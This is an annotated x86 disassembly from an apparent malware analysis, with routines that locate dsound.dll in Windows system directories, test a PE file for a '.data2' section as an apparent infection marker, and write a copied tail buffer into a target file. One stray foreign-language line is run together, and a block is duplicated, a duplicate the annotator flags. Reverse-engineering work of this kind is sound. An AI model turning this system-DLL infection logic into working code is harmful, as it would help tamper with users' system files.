0040116E |. 8D5424 10 lea edx, dword ptr [esp+10] ; &bytesWritten
00401172 |. 6A 00 push 0 ; /pOverlapped = NULL
00401174 |. 52 push edx ; |pBytesWritten
00401175 |. 8D8424 200100>lea eax, dword ptr [esp+120] ; | tail buffer
0040117C |. 68 FA040000 push 4FA ; |nBytesToWrite = 4FA (1274.)
00401181 |. 50 push eax ; |Buffer
00401182 |. 56 push esi ; |hFile
00401183 |. FF15 04304000 call dword ptr [<&KERNEL32.WriteFile>> ; \write the copied tail; result not checked
00401189 |> 56 push esi
0040118A |. FFD5 call ebp ; CloseHandle(target)
0040118C |. 5B pop ebx
0040118D |> 57 push edi
0040118E |. FFD5 call ebp ; CloseHandle(own file) - also reached with edi == -1
00401190 |. 5F pop edi
00401191 |. 5E pop esi
00401192 |. 5D pop ebp
00401193 |. 81C4 04060000 add esp, 604
00401199 \. C3 retn
; sub_401C10 - locate a DLL by file name and return its full path.
; Args (0x7C locals + 4 pushes + retaddr = 0x90): [esp+90] = output buffer,
;       [esp+94] = file name (the analyst's annotations show "dsound.dll")
; Tries, in order, with CreateFileA(GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING):
;   1. <sysdir> + <string at 00404090> + <name>   (inlined strlen/strcat, 00401C3A-00401CA4;
;      the caller listing on this page shows 00404090 acting as a path separator)
;   2. <sysdir>\..\system\<name>
;   3. <sysdir>\..\<name>  (resolves to %windir%\<name>; the original annotation is inconsistent here)
; Return: eax = 1 and the opened path copied into *out (lstrcpyA at 00401D9D);
;         0 if none of the three opens.
; Locals: path buffer at [esp+10], 0x7B bytes (BufSize given to GetSystemDirectoryA);
;         the later lstrcatA calls are unbounded.
; Regs:   ebp = GetSystemDirectoryA, ebx = lstrcatA, esi = file handle
00401C10 /$ 83EC 7C sub esp, 7C
00401C13 |. 53 push ebx
00401C14 |. 55 push ebp
00401C15 |. 56 push esi
00401C16 |. 57 push edi
00401C17 |. B9 1E000000 mov ecx, 1E
00401C1C |. 33C0 xor eax, eax
00401C1E |. 8D7C24 11 lea edi, dword ptr [esp+11]
00401C22 |. C64424 10 00 mov byte ptr [esp+10], 0
00401C27 |. F3:AB rep stos dword ptr es:[edi] ; zero the 0x7B-byte path buffer at [esp+10]
00401C29 |. 8B2D 7C304000 mov ebp, dword ptr [<&KERNEL32.GetSy> ; kernel32.GetSystemDirectoryA
00401C2F |. 6A 7B push 7B ; /BufSize = 7B (123.)
00401C31 |. 66:AB stos word ptr es:[edi] ; |
00401C33 |. 8D4424 14 lea eax, dword ptr [esp+14] ; | path buffer
00401C37 |. 50 push eax ; |Buffer
00401C38 |. FFD5 call ebp ; \system directory (return value / truncation not checked)
00401C3A |. BF 90404000 mov edi, 00404090 ; --- inlined strcat #1: src = string at 00404090
00401C3F |. 83C9 FF or ecx, FFFFFFFF
00401C42 |. 33C0 xor eax, eax
00401C44 |. 8D5424 10 lea edx, dword ptr [esp+10] ; dst = path buffer
00401C48 |. F2:AE repne scas byte ptr es:[edi] ; strlen(src)
00401C4A |. F7D1 not ecx ; ecx = len+1 (incl. NUL)
00401C4C |. 2BF9 sub edi, ecx ; edi back to start of src
00401C4E |. 50 push eax ; /hTemplateFile => NULL   (CreateFileA args are pushed interleaved with the copy)
00401C4F |. 8BF7 mov esi, edi ; | esi = src
00401C51 |. 8BD9 mov ebx, ecx ; | ebx = len+1
00401C53 |. 8BFA mov edi, edx ; | edi = dst
00401C55 |. 83C9 FF or ecx, FFFFFFFF ; |
00401C58 |. F2:AE repne scas byte ptr es:[edi] ; | find the NUL of dst
00401C5A |. 8BCB mov ecx, ebx ; |
00401C5C |. 4F dec edi ; | edi -> dst's NUL
00401C5D |. C1E9 02 shr ecx, 2 ; |
00401C60 |. F3:A5 rep movs dword ptr es:[edi], dword p> ; | append src (dwords)
00401C62 |. 8BCB mov ecx, ebx ; |
00401C64 |. 8D5424 14 lea edx, dword ptr [esp+14] ; | dst = path buffer again
00401C68 |. 83E1 03 and ecx, 3 ; |
00401C6B |. 50 push eax ; |Attributes => 0
00401C6C |. F3:A4 rep movs byte ptr es:[edi], byte ptr> ; | append src (remaining bytes)
00401C6E |. 8BBC24 9C0000>mov edi, dword ptr [esp+9C] ; | --- inlined strcat #2: src = arg2 (file name)
00401C75 |. 83C9 FF or ecx, FFFFFFFF ; |
00401C78 |. F2:AE repne scas byte ptr es:[edi] ; | strlen(name)
00401C7A |. F7D1 not ecx ; |
00401C7C |. 2BF9 sub edi, ecx ; |
00401C7E |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401C80 |. 8BF7 mov esi, edi ; |
00401C82 |. 8BD9 mov ebx, ecx ; |
00401C84 |. 8BFA mov edi, edx ; |
00401C86 |. 83C9 FF or ecx, FFFFFFFF ; |
00401C89 |. F2:AE repne scas byte ptr es:[edi] ; |
00401C8B |. 8BCB mov ecx, ebx ; |
00401C8D |. 4F dec edi ; |
00401C8E |. C1E9 02 shr ecx, 2 ; |
00401C91 |. F3:A5 rep movs dword ptr es:[edi], dword p> ; | append name
00401C93 |. 8BCB mov ecx, ebx ; |
00401C95 |. 50 push eax ; |pSecurity => NULL
00401C96 |. 83E1 03 and ecx, 3 ; |
00401C99 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401C9B |. 8D4424 24 lea eax, dword ptr [esp+24] ; | path buffer
00401C9F |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401CA4 |. F3:A4 rep movs byte ptr es:[edi], byte ptr> ; |
00401CA6 |. 50 push eax ; |FileName
00401CA7 |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile> ; \try candidate 1 (analyst: %windir%\system32\dsound.dll)
00401CAD |. 8BF0 mov esi, eax
00401CAF |. 83FE FF cmp esi, -1
00401CB2 |. 0F85 D8000000 jnz 00401D90 ; opened -> copy path out and return 1
00401CB8 |. B9 1E000000 mov ecx, 1E
00401CBD |. 33C0 xor eax, eax
00401CBF |. 8D7C24 10 lea edi, dword ptr [esp+10]
00401CC3 |. 6A 7B push 7B ; /BufSize = 7B (123.)
00401CC5 |. F3:AB rep stos dword ptr es:[edi] ; | re-zero the path buffer
00401CC7 |. 66:AB stos word ptr es:[edi] ; |
00401CC9 |. 8D4C24 14 lea ecx, dword ptr [esp+14] ; |
00401CCD |. 51 push ecx ; |Buffer
00401CCE |. AA stos byte ptr es:[edi] ; |
00401CCF |. FFD5 call ebp ; \system directory again
00401CD1 |. 8B1D 4C304000 mov ebx, dword ptr [<&KERNEL32.lstrc> ; kernel32.lstrcatA
00401CD7 |. 8D5424 10 lea edx, dword ptr [esp+10]
00401CDB |. 68 84404000 push 00404084 ; /StringToAdd = "\..\system\"
00401CE0 |. 52 push edx ; |ConcatString
00401CE1 |. FFD3 call ebx ; \-> <sysdir>\..\system\  (i.e. %windir%\system\)
00401CE3 |. 8B8424 940000>mov eax, dword ptr [esp+94] ; arg2 = file name
00401CEA |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00401CEE |. 50 push eax ; /StringToAdd
00401CEF |. 51 push ecx ; |ConcatString
00401CF0 |. FFD3 call ebx ; \-> %windir%\system\<name>
00401CF2 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401CF4 |. 6A 00 push 0 ; |Attributes = 0
00401CF6 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401CF8 |. 6A 00 push 0 ; |pSecurity = NULL
00401CFA |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401CFC |. 8D5424 24 lea edx, dword ptr [esp+24] ; |
00401D00 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401D05 |. 52 push edx ; |FileName
00401D06 |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile> ; \try candidate 2 (analyst: %windir%\system\dsound.dll)
00401D0C |. 8BF0 mov esi, eax
00401D0E |. 83FE FF cmp esi, -1
00401D11 |. 75 6E jnz short 00401D81 ; opened -> copy path out and return 1
00401D13 |. B9 1E000000 mov ecx, 1E
00401D18 |. 33C0 xor eax, eax
00401D1A |. 8D7C24 10 lea edi, dword ptr [esp+10]
00401D1E |. 6A 7B push 7B ; /BufSize = 7B (123.)
00401D20 |. F3:AB rep stos dword ptr es:[edi] ; | re-zero the path buffer
00401D22 |. 66:AB stos word ptr es:[edi] ; |
00401D24 |. AA stos byte ptr es:[edi] ; |
00401D25 |. 8D4424 14 lea eax, dword ptr [esp+14] ; |
00401D29 |. 50 push eax ; |Buffer
00401D2A |. FFD5 call ebp ; \system directory again
00401D2C |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00401D30 |. 68 7C404000 push 0040407C ; /StringToAdd = "\..\"
00401D35 |. 51 push ecx ; |ConcatString
00401D36 |. FFD3 call ebx ; \-> <sysdir>\..\  (i.e. %windir%\; the original annotation says system32 here, which does not match the appended string)
00401D38 |. 8B9424 940000>mov edx, dword ptr [esp+94] ; arg2 = file name
00401D3F |. 8D4424 10 lea eax, dword ptr [esp+10]
00401D43 |. 52 push edx ; /StringToAdd
00401D44 |. 50 push eax ; |ConcatString
00401D45 |. FFD3 call ebx ; \-> %windir%\<name>
00401D47 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401D49 |. 6A 00 push 0 ; |Attributes = 0
00401D4B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401D4D |. 6A 00 push 0 ; |pSecurity = NULL
00401D4F |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401D51 |. 8D4C24 24 lea ecx, dword ptr [esp+24] ; |
00401D55 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401D5A |. 51 push ecx ; |FileName
00401D5B |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile> ; \try candidate 3
00401D61 |. 8BF0 mov esi, eax
00401D63 |. 83FE FF cmp esi, -1
00401D66 |. 75 0A jnz short 00401D72 ; opened -> copy path out and return 1
00401D68 |. 5F pop edi ; none of the three candidates opened
00401D69 |. 5E pop esi
00401D6A |. 5D pop ebp
00401D6B |. 33C0 xor eax, eax ; return 0
00401D6D |. 5B pop ebx
00401D6E |. 83C4 7C add esp, 7C
00401D71 |. C3 retn
00401D72 |> 8B8424 900000>mov eax, dword ptr [esp+90] ; candidate 3: out buffer
00401D79 |. 8D5424 10 lea edx, dword ptr [esp+10]
00401D7D |. 52 push edx
00401D7E |. 50 push eax
00401D7F |. EB 1C jmp short 00401D9D
00401D81 |> 8B9424 900000>mov edx, dword ptr [esp+90] ; candidate 2: out buffer
00401D88 |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00401D8C |. 51 push ecx
00401D8D |. 52 push edx
00401D8E |. EB 0D jmp short 00401D9D
00401D90 |> 8B8C24 900000>mov ecx, dword ptr [esp+90] ; candidate 1: out buffer
00401D97 |. 8D4424 10 lea eax, dword ptr [esp+10]
00401D9B |. 50 push eax ; /String2 = built path
00401D9C |. 51 push ecx ; |String1 = arg1 (out)
00401D9D |> FF15 44304000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA(out, path)  (0012F288 in the analyst's session)
00401DA3 |. 56 push esi ; /hObject
00401DA4 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close the probe handle
00401DAA |. 5F pop edi
00401DAB |. 5E pop esi
00401DAC |. 5D pop ebp
00401DAD |. B8 01000000 mov eax, 1 ; success
00401DB2 |. 5B pop ebx
00401DB3 |. 83C4 7C add esp, 7C
00401DB6 \. C3 retn
004026A1 |. 51 push ecx ; /String 004026A2 |. FFD6 call esi ; \返回缓冲区内%windir%\system32\dsound.dll的长度 004026A4 |. 85C0 test eax, eax 004026A6 |. 7E 3C jle short 004026E4 ; 不存在则跳走
; sub_401600 - test whether a PE file contains a section named ".data2".
; Arg:    [esp+1054] (0x104C locals via the __chkstk-style helper at 00402BA0, + push ebx
;         + retaddr) = path (the analyst annotates it as %windir%\system32\dsound.dll)
; Return: eax = 1 if a section named ".data2" with a non-zero VirtualAddress exists,
;         0 otherwise or on any open/read failure. The result lives in [esp+18]
;         (initialised to 0 at 00401628, written through the 7 pushed CreateFile args).
; Walk:   read IMAGE_DOS_HEADER (0x40) at [esp+5C] -> edi = e_lfanew ([esp+98] = +0x3C);
;         read 4 bytes at e_lfanew+0x28 (AddressOfEntryPoint; not used further here);
;         read 0x14 bytes at e_lfanew+4 (IMAGE_FILE_HEADER; NumberOfSections at [esp+1E]);
;         seek to e_lfanew+0xF8 (first IMAGE_SECTION_HEADER after a PE32 optional header)
;         and _stricmp each 0x28-byte header's Name against ".data2".
; Presumably an "already patched?" marker for the dropped dsound.dll - TODO confirm against
; the rest of the write-up (not visible here).
; Regs:   esi = hFile, ebp = SetFilePointer, edi = e_lfanew / next section header offset,
;         ebx = section counter inside the loop
00401600 /$ B8 4C100000 mov eax, 104C
00401605 |. E8 96150000 call 00402BA0 ; stack probe: allocates 0x104C bytes of locals
0040160A |. 53 push ebx
0040160B |. 8B8424 541000>mov eax, dword ptr [esp+1054] ; arg1 = path
00401612 |. 55 push ebp
00401613 |. 56 push esi
00401614 |. 57 push edi
00401615 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401617 |. 68 00000008 push 8000000 ; |Attributes = SEQUENTIAL_SCAN
0040161C |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040161E |. 6A 00 push 0 ; |pSecurity = NULL
00401620 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401622 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401627 |. 50 push eax ; |FileName
00401628 |. C74424 34 000>mov dword ptr [esp+34], 0 ; | result = 0 ([esp+18] once the args are popped)
00401630 |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile> ; \open the PE file (analyst: %windir%\system32\dsound.dll)
00401636 |. 8BF0 mov esi, eax
00401638 |. 83FE FF cmp esi, -1
0040163B |. 75 0D jnz short 0040164A ; opened -> continue
0040163D |. 5F pop edi
0040163E |. 5E pop esi
0040163F |. 5D pop ebp
00401640 |. 33C0 xor eax, eax ; return 0
00401642 |. 5B pop ebx
00401643 |. 81C4 4C100000 add esp, 104C
00401649 |. C3 retn
0040164A |> 8D4C24 10 lea ecx, dword ptr [esp+10] ; &bytesRead
0040164E |. 6A 00 push 0 ; /pOverlapped = NULL
00401650 |. 51 push ecx ; |pBytesRead
00401651 |. 8D5424 64 lea edx, dword ptr [esp+64] ; | DOS header buffer
00401655 |. 6A 40 push 40 ; |BytesToRead = 40 (64.)
00401657 |. 52 push edx ; |Buffer
00401658 |. 56 push esi ; |hFile
00401659 |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \read IMAGE_DOS_HEADER (0x40 bytes; 0012E22C in the analyst's session)
0040165F |. 85C0 test eax, eax
00401661 |. 75 14 jnz short 00401677 ; read ok -> continue
00401663 |. 56 push esi ; /hObject
00401664 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close and return 0
0040166A |. 5F pop edi
0040166B |. 5E pop esi
0040166C |. 5D pop ebp
0040166D |. 33C0 xor eax, eax
0040166F |. 5B pop ebx
00401670 |. 81C4 4C100000 add esp, 104C
00401676 |. C3 retn
00401677 |> 8BBC24 980000>mov edi, dword ptr [esp+98] ; edi = e_lfanew (DOS header + 0x3C); not range-checked
0040167E |. 8B2D 28304000 mov ebp, dword ptr [<&KERNEL32.SetFi> ; kernel32.SetFilePointer
00401684 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00401686 |. 6A 00 push 0 ; |pOffsetHi = NULL
00401688 |. 8D5F 28 lea ebx, dword ptr [edi+28] ; | e_lfanew + 0x28 = AddressOfEntryPoint field
0040168B |. 53 push ebx ; |OffsetLo
0040168C |. 56 push esi ; |hFile
0040168D |. FFD5 call ebp ; \seek to NT headers + 0x28 (0x110 in the analyst's session)
0040168F |. 8D4424 10 lea eax, dword ptr [esp+10] ; &bytesRead
00401693 |. 6A 00 push 0 ; /pOverlapped = NULL
00401695 |. 50 push eax ; |pBytesRead
00401696 |. 8D4C24 38 lea ecx, dword ptr [esp+38] ; |
0040169A |. 6A 04 push 4 ; |BytesToRead = 4
0040169C |. 51 push ecx ; |Buffer
0040169D |. 56 push esi ; |hFile
0040169E |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \read the 4-byte AddressOfEntryPoint (not referenced again in this routine)
004016A4 |. 85C0 test eax, eax
004016A6 |. 75 14 jnz short 004016BC ; read ok -> continue
004016A8 |. 56 push esi ; /hObject
004016A9 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close and return 0
004016AF |. 5F pop edi
004016B0 |. 5E pop esi
004016B1 |. 5D pop ebp
004016B2 |. 33C0 xor eax, eax
004016B4 |. 5B pop ebx
004016B5 |. 81C4 4C100000 add esp, 104C
004016BB |. C3 retn
004016BC |> 6A 00 push 0
004016BE |. 6A 00 push 0
004016C0 |. 53 push ebx
004016C1 |. 56 push esi
004016C2 |. FFD5 call ebp ; seek back to NT headers + 0x28 again (appears redundant)
004016C4 |. 33D2 xor edx, edx
004016C6 |. 33DB xor ebx, ebx
004016C8 |. 895424 1E mov dword ptr [esp+1E], edx ; zero the 0x14-byte IMAGE_FILE_HEADER buffer, interleaved with the SetFilePointer arg pushes
004016CC |. 53 push ebx
004016CD |. 895424 26 mov dword ptr [esp+26], edx
004016D1 |. 8D47 04 lea eax, dword ptr [edi+4] ; e_lfanew + 4 = IMAGE_FILE_HEADER
004016D4 |. 895424 2A mov dword ptr [esp+2A], edx
004016D8 |. 53 push ebx
004016D9 |. 895424 32 mov dword ptr [esp+32], edx
004016DD |. 50 push eax
004016DE |. 56 push esi
004016DF |. 66:895C24 2C mov word ptr [esp+2C], bx
004016E4 |. 66:895424 3E mov word ptr [esp+3E], dx
; NOTE(review): the next 14 lines (004016C4-004016E4) are a verbatim repeat of the 14 lines
; above - a copy/paste artifact of the listing, not a second execution of that code.
004016C4 |. 33D2 xor edx, edx
004016C6 |. 33DB xor ebx, ebx
004016C8 |. 895424 1E mov dword ptr [esp+1E], edx
004016CC |. 53 push ebx
004016CD |. 895424 26 mov dword ptr [esp+26], edx
004016D1 |. 8D47 04 lea eax, dword ptr [edi+4]
004016D4 |. 895424 2A mov dword ptr [esp+2A], edx
004016D8 |. 53 push ebx
004016D9 |. 895424 32 mov dword ptr [esp+32], edx
004016DD |. 50 push eax
004016DE |. 56 push esi
004016DF |. 66:895C24 2C mov word ptr [esp+2C], bx
004016E4 |. 66:895424 3E mov word ptr [esp+3E], dx
004016E9 |. FFD5 call ebp ; seek to IMAGE_FILE_HEADER (0xEC in the analyst's session)
004016EB |. 8D4C24 10 lea ecx, dword ptr [esp+10] ; &bytesRead
004016EF |. 53 push ebx ; /pOverlapped = NULL
004016F0 |. 51 push ecx ; |pBytesRead
004016F1 |. 8D5424 24 lea edx, dword ptr [esp+24] ; | IMAGE_FILE_HEADER buffer
004016F5 |. 6A 14 push 14 ; |BytesToRead = 14 (20.)
004016F7 |. 52 push edx ; |Buffer
004016F8 |. 56 push esi ; |hFile
004016F9 |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \read IMAGE_FILE_HEADER (result not checked)
004016FF |. 81C7 F8000000 add edi, 0F8 ; e_lfanew + 0xF8 = first section header (assumes a PE32 optional header of 0xE0 bytes)
00401705 |. 53 push ebx
00401706 |. 53 push ebx
00401707 |. 57 push edi
00401708 |. 56 push esi
00401709 |. FFD5 call ebp ; seek to the section table (0x1E0 in the analyst's session)
0040170B |. 66:395C24 1E cmp word ptr [esp+1E], bx ; NumberOfSections == 0 ?
00401710 |. 76 7B jbe short 0040178D ; no sections -> done (result stays 0)
00401712 |. 83C7 28 add edi, 28
00401715 |. 897C24 14 mov dword ptr [esp+14], edi ; [esp+14] = file offset of the NEXT section header
00401719 |> B9 09000000 /mov ecx, 9
0040171E |. 33C0 |xor eax, eax
00401720 |. 8D7C24 35 |lea edi, dword ptr [esp+35]
00401724 |. C64424 34 00 |mov byte ptr [esp+34], 0
00401729 |. F3:AB |rep stos dword ptr es:[edi] ; zero the 0x28-byte section header buffer at [esp+34]
0040172B |. 66:AB |stos word ptr es:[edi]
0040172D |. AA |stos byte ptr es:[edi]
0040172E |. 8D4424 10 |lea eax, dword ptr [esp+10]
00401732 |. 6A 00 |push 0 ; /pOverlapped = NULL
00401734 |. 50 |push eax ; |pBytesRead
00401735 |. 8D4C24 3C |lea ecx, dword ptr [esp+3C] ; |
00401739 |. 6A 28 |push 28 ; |BytesToRead = 28 (40.)
0040173B |. 51 |push ecx ; |Buffer
0040173C |. 56 |push esi ; |hFile
0040173D |. FF15 24304000 |call dword ptr [<&KERNEL32.ReadFile>> ; \read one IMAGE_SECTION_HEADER (result not checked)
00401743 |. 8D5424 34 |lea edx, dword ptr [esp+34] ; section Name (8 bytes, may be unterminated)
00401747 |. 68 50404000 |push 00404050 ; /s2 = ".data2"
0040174C |. 52 |push edx ; |s1
0040174D |. FF15 A4304000 |call dword ptr [<&MSVCRT._stricmp>] ; \compare the section name with ".data2"
00401753 |. 83C4 08 |add esp, 8 ; cdecl cleanup
00401756 |. 85C0 |test eax, eax
00401758 |. 74 23 |je short 0040177D ; match -> check its VirtualAddress
0040175A |. 8B7C24 14 |mov edi, dword ptr [esp+14]
0040175E |. 6A 00 |push 0
00401760 |. 6A 00 |push 0
00401762 |. 57 |push edi
00401763 |. 56 |push esi
00401764 |. FFD5 |call ebp ; seek to the next section header
00401766 |. 8B4424 1E |mov eax, dword ptr [esp+1E]
0040176A |. 43 |inc ebx ; ++section index
0040176B |. 25 FFFF0000 |and eax, 0FFFF ; NumberOfSections (16-bit)
00401770 |. 83C7 28 |add edi, 28
00401773 |. 3BD8 |cmp ebx, eax
00401775 |. 897C24 14 |mov dword ptr [esp+14], edi
00401779 |.^ 7C 9E \jl short 00401719 ; loop over all section headers (signed compare)
0040177B |. EB 10 jmp short 0040178D ; not found -> result stays 0
0040177D |> \8B4424 40 mov eax, dword ptr [esp+40] ; section header + 0xC = VirtualAddress
00401781 |. 85C0 test eax, eax
00401783 |. 74 08 je short 0040178D ; VirtualAddress == 0 -> treat as not present
00401785 |. C74424 18 010>mov dword ptr [esp+18], 1 ; result = 1
0040178D |> 56 push esi ; /hObject
0040178E |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close the file
00401794 |. 8B4424 18 mov eax, dword ptr [esp+18] ; return result
00401798 |. 5F pop edi
00401799 |. 5E pop esi
0040179A |. 5D pop ebp
0040179B |. 5B pop ebx
0040179C |. 81C4 4C100000 add esp, 104C
004017A2 \. C3 retn